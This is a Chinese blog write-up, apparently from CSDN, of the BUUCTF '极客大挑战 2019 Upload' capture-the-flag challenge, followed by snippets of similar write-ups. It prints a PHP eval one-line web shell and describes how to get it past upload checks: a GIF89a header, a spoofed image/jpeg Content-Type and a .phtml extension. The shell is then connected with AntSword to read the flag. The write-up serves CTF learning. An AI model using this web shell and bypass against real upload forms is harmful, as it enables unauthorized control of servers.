[极客大挑战 2019]Upload

最新推荐文章于 2023-04-29 19:22:54 发布
最新推荐文章于 2023-04-29 19:22:54 发布
阅读量716 收藏 1
点赞数
分类专栏: CTF题目 # buu 文章标签: php web upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuller_Yan/article/details/106746434
版权

[极客大挑战 2019]Upload

wp from Kuller_Yan

一道很简单的文件上传漏洞:
打开靶机看到很直观的页面让我们上传。随便上传一个一句话木马,发现
在这里插入图片描述
看来type必须是图片,那我们构建一个phtml文件

GIF89a
<script language="php">eval($_POST['123']);</script>

在上传的时候抓包,更改类型;image/jpeg
在这里插入图片描述
然后盲猜url为/upload
访问http://29f56e21-5b5a-4212-ae3d-6d643a261edf.node3.buuoj.cn/upload/159623.phtml
在这里插入图片描述
然后就直接蚁剑(菜刀也行)连接,在根目录发现flag
在这里插入图片描述

kuller_Yan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1070
Upload=> 文件上传漏洞。
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2506
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 713
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 945
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
Web-[极客挑战 2019] Upload1
汗的博客
05-21 1103
文章目录[极客挑战 2019]Upload1 [极客挑战 2019]Upload1 shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag ...
极客挑战2019-upload
m0_73303597的博客
12-11 360
自用
web-[极客挑战 2019]Upload
wojiushilsy的博客
05-16 345
题目要点题目内容解题 题目要点 Content-Type绕过 文件头绕过 后缀名绕过 题目内容 解题 蚁剑连接
BUUCTF [极客挑战 2019] Upload
Senimo
12-17 2554
BUUCTF [极客挑战 2019] Upload 考点: 1. 启动环境: 有上传头像的地方,首先上传正常图片测试: 上传了一张.jpg格式的文件,也显示不是图片 后续测试.php、.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包: ...
[极客挑战 2019]Upload详解
hxhxhxhxx的博客
07-05 378
[极客挑战 2019]Upload题目解法 题目 解法 我们发现源码什么都分析不出来, 而且拿御剑扫描也没有发现什么东西 那么我们只能硬着头皮上传了 上传也没什么思路,那么我们看看抓包 我们不断尝试,php的时候发现会返回一个not php 那么我们就进行绕过 但是我们又发现,文件内容绕不过,那么直接补上头文件GIF89a 成功上传,这里使用的是js标签一句话绕过,get,post,request都可以 最终我们找到 ...
Buuctf<极客挑战2019upload
m0_64444909的博客
04-07 5234
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
极客挑战 2019]EasySQL
最新发布
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值